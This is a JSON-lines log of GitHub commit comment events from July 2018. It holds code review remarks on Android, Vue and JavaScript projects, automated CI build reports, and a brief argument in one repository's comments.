{"id":"7958020588","type":"CommitCommentEvent","actor":{"login":"jkleiber"},"repo":{"name":"Sooner-Competitive-Robotics/colorduino-slave"},"payload":{"comment":{"id":29689400,"position":null,"line":null,"path":null,"commit_id":"b6f1b5f1ba05708068aac0d2f03c23b8b85201bb","created_at":"2018-07-12T18:41:19Z","updated_at":"2018-07-12T18:41:19Z","author_association":"CONTRIBUTOR","body":"@Dancopy , we are asking you to open an issue on the issues page of this repository. Go to this link: [https://github.com/Sooner-Competitive-Robotics/colorduino-slave/issues](https://github.com/Sooner-Competitive-Robotics/colorduino-slave/issues) and click \"New issue\" and then ask your questions so we can address them appropriately."}},"created_at":"2018-07-12T18:41:19Z"}
{"id":"7958024259","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689403,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-12T18:42:07Z","updated_at":"2018-07-12T18:42:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:42:07Z"}
{"id":"7958026205","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689407,"position":14,"line":14,"path":"SharedPref/app/src/main/java/com/example/simonedigiorgio/sharedpref/MainActivity.java","commit_id":"16a044b69b0c8ff3e8496e992ebf6ef1872d4f90","created_at":"2018-07-12T18:42:30Z","updated_at":"2018-07-12T18:42:30Z","author_association":"NONE","body":"Java conventions: mCamelCase! So, no underscore or initial capital: url, username, password. Plus better to have longer name to distinguish. Never have two variables with the same name and different cases like Username and USERNAME. Constants are ok since they should be all upper case."}},"created_at":"2018-07-12T18:42:30Z"}
{"id":"7958026431","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689408,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-12T18:42:32Z","updated_at":"2018-07-12T18:42:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:42:32Z"}
{"id":"7958028382","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689420,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-12T18:42:55Z","updated_at":"2018-07-12T18:42:55Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-12T18:42:55Z"}
{"id":"7958028902","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689423,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-12T18:43:01Z","updated_at":"2018-07-12T18:43:01Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-12T18:43:01Z"}
{"id":"7958030390","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689438,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-12T18:43:17Z","updated_at":"2018-07-12T18:43:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:43:17Z"}
{"id":"7958032366","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689442,"position":20,"line":20,"path":"SharedPref/app/src/main/java/com/example/simonedigiorgio/sharedpref/MainActivity.java","commit_id":"16a044b69b0c8ff3e8496e992ebf6ef1872d4f90","created_at":"2018-07-12T18:43:39Z","updated_at":"2018-07-12T18:43:39Z","author_association":"NONE","body":"Use longer strings since the SharedPreferences namespace is shared in the entire app and if someone needs a similar preference and call it \"url\" this is going to override your."}},"created_at":"2018-07-12T18:43:39Z"}
{"id":"7958035545","type":"CommitCommentEvent","actor":{"login":"jeromefroe"},"repo":{"name":"m3db/tally-cpp"},"payload":{"comment":{"id":29689450,"position":null,"line":null,"path":null,"commit_id":"02d318548a2babedd381ec5fe215429d63b796e9","created_at":"2018-07-12T18:44:18Z","updated_at":"2018-07-12T18:44:18Z","author_association":"CONTRIBUTOR","body":"This is an explicit requirement for ATG, we certainly wouldn't be opposed to someone adding CMake support though 😉 "}},"created_at":"2018-07-12T18:44:18Z"}
{"id":"7958039451","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689457,"position":83,"line":83,"path":"SharedPref/app/src/main/java/com/example/simonedigiorgio/sharedpref/MainActivity.java","commit_id":"16a044b69b0c8ff3e8496e992ebf6ef1872d4f90","created_at":"2018-07-12T18:45:05Z","updated_at":"2018-07-12T18:45:05Z","author_association":"NONE","body":"It should be fine for now, but remember never to save the password in the shared preferences. This is really risky and a hacker can login as you if you save the credentials in plain text. At this stage this is not a problem."}},"created_at":"2018-07-12T18:45:05Z"}
{"id":"7958039667","type":"CommitCommentEvent","actor":{"login":"augusto-jm-amaral"},"repo":{"name":"IvanMicai/react-vanilla-form"},"payload":{"comment":{"id":29689458,"position":126,"line":84,"path":"src/index.js","commit_id":"0ebd6a34e6ec24095ba60aff2d4110d874fc5bbd","created_at":"2018-07-12T18:45:09Z","updated_at":"2018-07-12T18:45:09Z","author_association":"NONE","body":"@IvanMicai foi adicionado a chamada do `OnChange`"}},"created_at":"2018-07-12T18:45:09Z"}
{"id":"7958040261","type":"CommitCommentEvent","actor":{"login":"jberkenbilt"},"repo":{"name":"pikepdf/pikepdf"},"payload":{"comment":{"id":29689460,"position":9,"line":6,"path":"README.rst","commit_id":"e78fe5a85c45c781822ad4f0678d83f0893a9c91","created_at":"2018-07-12T18:45:15Z","updated_at":"2018-07-12T18:45:15Z","author_association":"NONE","body":"@jbarlow83 I just learned about pikepdf today. This is very exciting -- I'd been wishing I had time to create a good Python interface around qpdf for some time, but I don't have time. I'm very open to any suggestions you may have for ways qpdf can make it easier for you make pikepdf clean. When I get a chance, I will take a good look at pikepdf as well....I often find myself whipping up quick one-off tools with qpdf, and I would rather be able to write them in Python than in C++."}},"created_at":"2018-07-12T18:45:15Z"}
{"id":"7958045017","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689472,"position":59,"line":59,"path":"SharedPref/app/src/main/java/com/example/simonedigiorgio/sharedpref/MainActivity.java","commit_id":"16a044b69b0c8ff3e8496e992ebf6ef1872d4f90","created_at":"2018-07-12T18:46:13Z","updated_at":"2018-07-12T18:46:13Z","author_association":"NONE","body":"Why do you save this in the SharedPreferences? Is it something you need to persist after you restart the app? Probably, not. So, better to pass it over. If you need this info after you close the app you are ok."}},"created_at":"2018-07-12T18:46:13Z"}
{"id":"7958046008","type":"CommitCommentEvent","actor":{"login":"jberkenbilt"},"repo":{"name":"pikepdf/pikepdf"},"payload":{"comment":{"id":29689474,"position":9,"line":6,"path":"README.rst","commit_id":"e78fe5a85c45c781822ad4f0678d83f0893a9c91","created_at":"2018-07-12T18:46:25Z","updated_at":"2018-07-12T18:46:25Z","author_association":"NONE","body":"Sorry to reach out to by commenting on a github commit. I don't have a direct email address. You can reach me by email if you'd like to discuss anything directly (or open a qpdf issue, of course). If I grab pikepdf and find anything, I'll open an issue in github."}},"created_at":"2018-07-12T18:46:25Z"}
{"id":"7958046918","type":"CommitCommentEvent","actor":{"login":"chagyun0213"},"repo":{"name":"nvdla/sw"},"payload":{"comment":{"id":29689478,"position":null,"line":null,"path":null,"commit_id":"03e90a2e081c7b475088751cb609df31cb14ceb0","created_at":"2018-07-12T18:46:35Z","updated_at":"2018-07-12T18:46:35Z","author_association":"NONE","body":"Could your provide more description about other fixes? "}},"created_at":"2018-07-12T18:46:35Z"}
{"id":"7958047341","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689480,"position":null,"line":null,"path":null,"commit_id":"a56d31e98b6ce5f05e70c52c453526ff1bb33cc5","created_at":"2018-07-12T18:46:40Z","updated_at":"2018-07-12T18:46:40Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-184639 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-184639\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T18:46:40Z"}
{"id":"7958047679","type":"CommitCommentEvent","actor":{"login":"bianavic"},"repo":{"name":"bianavic/helloword-ex"},"payload":{"comment":{"id":29689484,"position":null,"line":null,"path":null,"commit_id":"7841f69f82b70b4c7312b631d56a4fa2d931bdbc","created_at":"2018-07-12T18:46:45Z","updated_at":"2018-07-12T18:46:45Z","author_association":"OWNER","body":"![mulheres-computacao](https://user-images.githubusercontent.com/38224433/42653095-c32f8294-85ea-11e8-87c1-03e6f1fd94e8.jpg)\r\n"}},"created_at":"2018-07-12T18:46:45Z"}
{"id":"7958051711","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689490,"position":51,"line":51,"path":"SharedPref/app/src/main/res/layout/activity_main.xml","commit_id":"16a044b69b0c8ff3e8496e992ebf6ef1872d4f90","created_at":"2018-07-12T18:47:35Z","updated_at":"2018-07-12T18:47:35Z","author_association":"NONE","body":"Get use to dimen.xml. You can define something like browser_margin_medium = \"8dp\" and then use it all over here. Same for the colors in color.xml"}},"created_at":"2018-07-12T18:47:35Z"}
{"id":"7958054748","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29689496,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-12T18:48:12Z","updated_at":"2018-07-12T18:48:12Z","author_association":"NONE","body":"159013173_Issue#6243 (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2934 of 2934 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T18:48:12Z"}
{"id":"7958058856","type":"CommitCommentEvent","actor":{"login":"tonygod"},"repo":{"name":"tonygod/RoadArchitect"},"payload":{"comment":{"id":29689500,"position":null,"line":null,"path":null,"commit_id":"d36eb36d6569a5eda7d1cb128aa89bf949296931","created_at":"2018-07-12T18:49:04Z","updated_at":"2018-07-12T18:49:04Z","author_association":"OWNER","body":"the commit message references GSDRoadUtil.cs, but the actual file change is GSDRootUtil.cs"}},"created_at":"2018-07-12T18:49:04Z"}
{"id":"7958059872","type":"CommitCommentEvent","actor":{"login":"helpingothers4u2"},"repo":{"name":"helpingothers4u2/github.com"},"payload":{"comment":{"id":29689502,"position":372,"line":372,"path":"LICENSE","commit_id":"cf6414f2625641e4a036eae291e61a89493e7854","created_at":"2018-07-12T18:49:17Z","updated_at":"2018-07-12T18:49:17Z","author_association":"OWNER","body":"helpingothers4u"}},"created_at":"2018-07-12T18:49:17Z"}
{"id":"7958061911","type":"CommitCommentEvent","actor":{"login":"helpingothers4u2"},"repo":{"name":"helpingothers4u2/github.com"},"payload":{"comment":{"id":29689508,"position":4,"line":4,"path":"LICENSE","commit_id":"cf6414f2625641e4a036eae291e61a89493e7854","created_at":"2018-07-12T18:49:41Z","updated_at":"2018-07-12T18:49:41Z","author_association":"OWNER","body":"helpingothers4u"}},"created_at":"2018-07-12T18:49:41Z"}
{"id":"7958063436","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29689514,"position":null,"line":null,"path":null,"commit_id":"fbd8eac3abf2c1f03e53bc7e7eef4e2e807b4b2e","created_at":"2018-07-12T18:50:01Z","updated_at":"2018-07-12T18:50:01Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-12T18:50:01Z"}
{"id":"7958063817","type":"CommitCommentEvent","actor":{"login":"sawthinkar"},"repo":{"name":"sawthinkar/sawthinkar.github.io"},"payload":{"comment":{"id":29689515,"position":null,"line":null,"path":null,"commit_id":"6ec0ad4f0532f421212915373c048dc7e4e5c777","created_at":"2018-07-12T18:50:06Z","updated_at":"2018-07-12T18:50:06Z","author_association":"OWNER","body":"for BAT"}},"created_at":"2018-07-12T18:50:06Z"}
{"id":"7958064521","type":"CommitCommentEvent","actor":{"login":"sawthinkar"},"repo":{"name":"sawthinkar/sawthinkar.github.io"},"payload":{"comment":{"id":29689517,"position":null,"line":null,"path":null,"commit_id":"005ece9e7582ac599d260ca588ba782ee8c7ad09","created_at":"2018-07-12T18:50:14Z","updated_at":"2018-07-12T18:50:14Z","author_association":"OWNER","body":"For BAT"}},"created_at":"2018-07-12T18:50:14Z"}
{"id":"7958065298","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29689523,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T18:50:23Z","updated_at":"2018-07-12T18:50:23Z","author_association":"OWNER","body":"You know you always say \"goodbye\" yet you still comment, way to contradict your own statement, I'll call you a kid all you want, no matter my physical age, I'm still mentally more mature than you. Also editing comments on my own github repository is a violation? Rofl, you have copyright claims on your account kid. Contact discord and i'll make sure to tell them everything you've done. "}},"created_at":"2018-07-12T18:50:23Z"}
{"id":"7958070882","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29689538,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T18:51:29Z","updated_at":"2018-07-12T18:51:29Z","author_association":"OWNER","body":"Also, you say my name publicly, you're aware that's a violation aswell, do yourself a favor, worry about yourself, not me."}},"created_at":"2018-07-12T18:51:29Z"}
{"id":"7958080693","type":"CommitCommentEvent","actor":{"login":"Randium"},"repo":{"name":"werewolves-devs/Werewolf_Bot"},"payload":{"comment":{"id":29689557,"position":null,"line":null,"path":null,"commit_id":"4ccebef0f14ecb633b282851464af189c8139241","created_at":"2018-07-12T18:53:24Z","updated_at":"2018-07-12T18:53:24Z","author_association":"COLLABORATOR","body":"I WANTED TO ADD TO THE TITLE THAT I ADDED MAYOR AND REPORTER BUT IT ALREADY SAVED 😭 "}},"created_at":"2018-07-12T18:53:24Z"}
{"id":"7958089259","type":"CommitCommentEvent","actor":{"login":"geriski"},"repo":{"name":"geriski/projectH"},"payload":{"comment":{"id":29689574,"position":null,"line":null,"path":null,"commit_id":"c9f16e67d77f8a884e4eb0b72eb82b4e88b19b2e","created_at":"2018-07-12T18:55:06Z","updated_at":"2018-07-12T18:55:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Műszaki vizsga dátum megjelenitése dátun formátumban](https://trello.com/c/FhlwQfmX/22-m%C5%B1szaki-vizsga-d%C3%A1tum-megjelenit%C3%A9se-d%C3%A1tun-form%C3%A1tumban)"}},"created_at":"2018-07-12T18:55:06Z"}
{"id":"7958090206","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29689576,"position":44,"line":52,"path":"src/components/NavBar.vue","commit_id":"edd154eaab75a6b8bb8c374caf18405b7a32683c","created_at":"2018-07-12T18:55:16Z","updated_at":"2018-07-12T18:55:16Z","author_association":"CONTRIBUTOR","body":"NICEEEEEEEEEEEEEEEE"}},"created_at":"2018-07-12T18:55:16Z"}
{"id":"7958092148","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29689578,"position":37,"line":45,"path":"src/components/NavBar.vue","commit_id":"edd154eaab75a6b8bb8c374caf18405b7a32683c","created_at":"2018-07-12T18:55:39Z","updated_at":"2018-07-12T18:55:39Z","author_association":"CONTRIBUTOR","body":"ALSO NICEEEEEEEEEE"}},"created_at":"2018-07-12T18:55:39Z"}
{"id":"7958093608","type":"CommitCommentEvent","actor":{"login":"vikas-jamdar"},"repo":{"name":"vikas-jamdar/google-cloud-python-happybase"},"payload":{"comment":{"id":29689580,"position":null,"line":null,"path":null,"commit_id":"de887c181237496a726210875c133b48e9d83fd4","created_at":"2018-07-12T18:55:56Z","updated_at":"2018-07-12T18:55:56Z","author_association":"OWNER","body":"Changes related to yield_rows\r\n1)rows() and scan() using only row generator\r\n2)In unit test yield_rows is built based existing read_rows populated data. "}},"created_at":"2018-07-12T18:55:56Z"}
{"id":"7958093987","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29689581,"position":52,"line":55,"path":"src/components/NavBar.vue","commit_id":"edd154eaab75a6b8bb8c374caf18405b7a32683c","created_at":"2018-07-12T18:56:01Z","updated_at":"2018-07-12T18:56:01Z","author_association":"CONTRIBUTOR","body":"Shouldn't need this with flexbox?"}},"created_at":"2018-07-12T18:56:01Z"}
{"id":"7958094636","type":"CommitCommentEvent","actor":{"login":"kkapsner"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29689583,"position":null,"line":null,"path":null,"commit_id":"6d1c051323bf681a9dfdd806941292d0dcfa6dca","created_at":"2018-07-12T18:56:10Z","updated_at":"2018-07-12T18:56:10Z","author_association":"OWNER","body":"Stimmt - liest sich besser: 9711c67c3fef8ce46a9c65a1b21697d6f958f74f"}},"created_at":"2018-07-12T18:56:10Z"}
{"id":"7958097730","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29689590,"position":74,"line":74,"path":"src/components/NavBar.vue","commit_id":"edd154eaab75a6b8bb8c374caf18405b7a32683c","created_at":"2018-07-12T18:56:46Z","updated_at":"2018-07-12T18:56:46Z","author_association":"CONTRIBUTOR","body":"logologo and logo?"}},"created_at":"2018-07-12T18:56:46Z"}
{"id":"7958098573","type":"CommitCommentEvent","actor":{"login":"peterhaneve"},"repo":{"name":"peterhaneve/evemon"},"payload":{"comment":{"id":29689592,"position":null,"line":null,"path":null,"commit_id":"4a012e3d960fcc679b388fafc9d238c0ba86e4a3","created_at":"2018-07-12T18:56:56Z","updated_at":"2018-07-12T18:56:56Z","author_association":"OWNER","body":"I have realized that asset safety wraps work differently than inaccessible structures (why CCP?) Therefore, I am trying to anchor a structure somewhere out of the way where I can manipulate the ACL and make industry jobs, assets, and so forth inaccessible."}},"created_at":"2018-07-12T18:56:56Z"}
{"id":"7958100399","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29689597,"position":111,"line":103,"path":"src/components/NavBar.vue","commit_id":"edd154eaab75a6b8bb8c374caf18405b7a32683c","created_at":"2018-07-12T18:57:20Z","updated_at":"2018-07-12T18:57:20Z","author_association":"CONTRIBUTOR","body":"kill the comments"}},"created_at":"2018-07-12T18:57:20Z"}
{"id":"7958104219","type":"CommitCommentEvent","actor":{"login":"wvdvegt"},"repo":{"name":"peterhaneve/evemon"},"payload":{"comment":{"id":29689604,"position":null,"line":null,"path":null,"commit_id":"4a012e3d960fcc679b388fafc9d238c0ba86e4a3","created_at":"2018-07-12T18:58:05Z","updated_at":"2018-07-12T18:58:05Z","author_association":"NONE","body":"I think because the items are in limbo, not at the station they originated from and not yet where you want them to go."}},"created_at":"2018-07-12T18:58:05Z"}
{"id":"7958107508","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689616,"position":9,"line":9,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T18:58:45Z","updated_at":"2018-07-12T18:58:45Z","author_association":"NONE","body":"тут все плохо с отступами, нужно поправить"}},"created_at":"2018-07-12T18:58:45Z"}
{"id":"7958111770","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29689625,"position":null,"line":null,"path":null,"commit_id":"7c85d4a6f9252eaed827a95f5dc72e69140ba112","created_at":"2018-07-12T18:59:36Z","updated_at":"2018-07-12T18:59:36Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-12T18:59:36Z"}
{"id":"7958112525","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689627,"position":44,"line":44,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T18:59:45Z","updated_at":"2018-07-12T18:59:45Z","author_association":"NONE","body":"все что справа от `||` выполняется только тогда, когда то, что слева truly (то есть, можно смело отрывать)"}},"created_at":"2018-07-12T18:59:45Z"}
{"id":"7958115432","type":"CommitCommentEvent","actor":{"login":"disprosium8"},"repo":{"name":"periscope-ps/unis"},"payload":{"comment":{"id":29689639,"position":9,"line":234,"path":"periscope/app.py","commit_id":"26893a29d3f52846c1a3f8a2ee59d340a86e2866","created_at":"2018-07-12T19:00:20Z","updated_at":"2018-07-12T19:00:20Z","author_association":"CONTRIBUTOR","body":"The only issue here is that you've now broken the ability to manually set the accessPoint in the config.  If it's not set, we should default to the dynamic lookup, if it is set we should respect the user config.  There are lots of instances where the user does need to specify the external accessPoint."}},"created_at":"2018-07-12T19:00:20Z"}
{"id":"7958120219","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29689651,"position":null,"line":null,"path":null,"commit_id":"7c85d4a6f9252eaed827a95f5dc72e69140ba112","created_at":"2018-07-12T19:01:16Z","updated_at":"2018-07-12T19:01:16Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T19:01:16Z"}
{"id":"7958120445","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689652,"position":61,"line":61,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:01:19Z","updated_at":"2018-07-12T19:01:19Z","author_association":"NONE","body":"не нужно так делать, надо сразу сделать grid массивом в самом верху"}},"created_at":"2018-07-12T19:01:19Z"}
